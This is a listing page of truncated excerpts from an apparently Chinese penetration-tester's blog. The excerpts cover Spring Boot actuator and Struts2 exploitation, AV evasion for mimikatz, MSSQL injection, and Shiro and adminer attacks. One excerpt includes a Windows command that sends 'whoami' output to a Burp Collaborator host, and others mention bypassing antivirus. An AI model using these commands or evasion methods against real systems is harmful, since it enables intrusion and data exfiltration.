台部落wkiller

https://www.yuque.com/woshikiller/izq9t0

2022-11-23 13:37:06

因爲習慣用Markdown來寫文檔, 所以常常需要新建.md文檔,但由於Windows並不會自帶把.md文檔放入右鍵新建項中（像Word那樣），所以方便起見，自己手動設置，其實就是把它寫進Windows的註冊表。方法一: 因爲習慣用Mar

2022-03-11 13:37:26

1.奇葩的任意用戶註冊來到註冊處點擊發送驗證碼等待重新發送的秒數結束，一定要等這個結束才能成功我開始的時候成功一個結果復現不了後來發現是這個原因，真想打開開發的腦袋看看隨便打驗證碼填密碼，確定抓包成功註冊 2.http參數

2022-03-05 13:37:29

一.Spring Boot Actuators Spring Boot Actuator是Spring Boot提供的對應用系統的監控和管理的集成功能，可以查看應用配置的詳細信息，例如自動化配置信息、創建的Spring beans信息、系統

2022-03-01 13:37:26

windows下通過start命令 for /F %X in ('whoami') do start http://uusifci7x1s0hcrny1lkqwqyjppfd4.burpcollaborator.net/%X 會使用默

2022-02-16 13:37:27

某日朋友發來一個Struts2的洞說開始測試的時候能執行命令，結果交了以後審覈說復現不了，他看了一下是被waf攔了。於是發我看看能不能繞過。首先用普通的payload打一下 %{(#test='multipart/form-data

2020-12-31 13:21:32

darkarmour是一個可用來免殺exe的項目，github地址：https://github.com/bats3c/darkarmour 我們使用darkarmour來免殺mimikatz。 ./darkarmour.py -f mim

2020-12-10 13:34:46

1.資源操作法使用工具： Restorator 2018 BeCyIconGrabber 首先我們從github下載ew使用360進行查殺打開Restorator 將ew拖入，右鍵添加資源選擇圖標，名稱隨便填一個確定使用BeC

2020-12-10 13:34:46

某日同事發來一注入點說是mssql用sqlmap跑可以執行命令，但是用powershell和mstha都無法上線cs，叫我看看。首先用sqlmap跑一下，發現確實能執行命令，ping了一下dnslog發現不出網。那麼這裏考慮寫she

2020-12-10 13:34:46

1.mimikatz源碼首先在github下載mimikatz源碼 https://github.com/gentilkiwi/mimikatz 使用vs2017打開工程 2.替換mimikatz字符串按ctrl+shift+f替換

2020-12-10 13:34:46

內網滲透是有的時候會遇到對方SSMS沒斷開連接正連着別的機器的mssql此時有兩種方法可以獲取sa密碼當密碼強度較弱時可以使用第一隻方式，第一種方式解不開的情況下可以使用後面二種方式 1.直接查詢sa密碼hash 使用如下語句： Sel

2020-10-24 13:33:37

前些日子同事發微信問我一個問題沒聽懂他說的沒回顯是啥意思，於是叫他把站發給我。瀏覽器不掛burp代理能正常打開，掛上burp代理以後瀏覽器顯示連接超時首先測試burp能抓其他的包應不是這個原因然後f12打開瀏覽器調試工具，刷新

2020-10-21 13:33:57

日穿掃描掃到一個spring boot actuator 可以看到有jolokia這個端點，再看下jolokia/list，存在type=MBeanFactory 關鍵字可以使用jolokia-realm-jndi-rce具體步驟如下

2020-07-30 14:19:38

0x01 Shiro反序列化命令執行？日常挖洞，burpsuite插件shiro告警用ShiroExploit的dnslog方式和靜態文件回顯方式都沒檢測出來。tomcat的回顯也是不行。 0x02 任意文件上傳？這個站打開是個登

2020-07-24 14:19:05

掃敏感文件掃到一個adminer 第三次遇到了，先看版本4.2.5比較低可以利用mysql服務端讀客戶端文件漏洞（高版本修復了）。通過報錯得到這個站是linux、虛擬主機、thinkphp3、絕對路徑、某cms 虛擬主機權限很低思路是

2020-07-16 14:19:00